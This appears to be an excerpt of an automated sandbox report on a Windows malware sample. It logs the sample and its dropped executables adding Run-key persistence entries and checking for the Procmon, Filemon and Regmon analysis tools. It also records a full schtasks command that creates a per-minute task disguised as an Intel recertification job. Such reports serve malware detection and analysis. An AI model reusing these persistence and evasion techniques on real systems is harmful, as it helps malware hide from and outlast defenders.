                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ce29828af5.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: Regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: Filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77594b3442.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 77594b3442.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 513dad5c05.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9d4ddc637a.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ce29828af5.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ce29828af5.exeJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
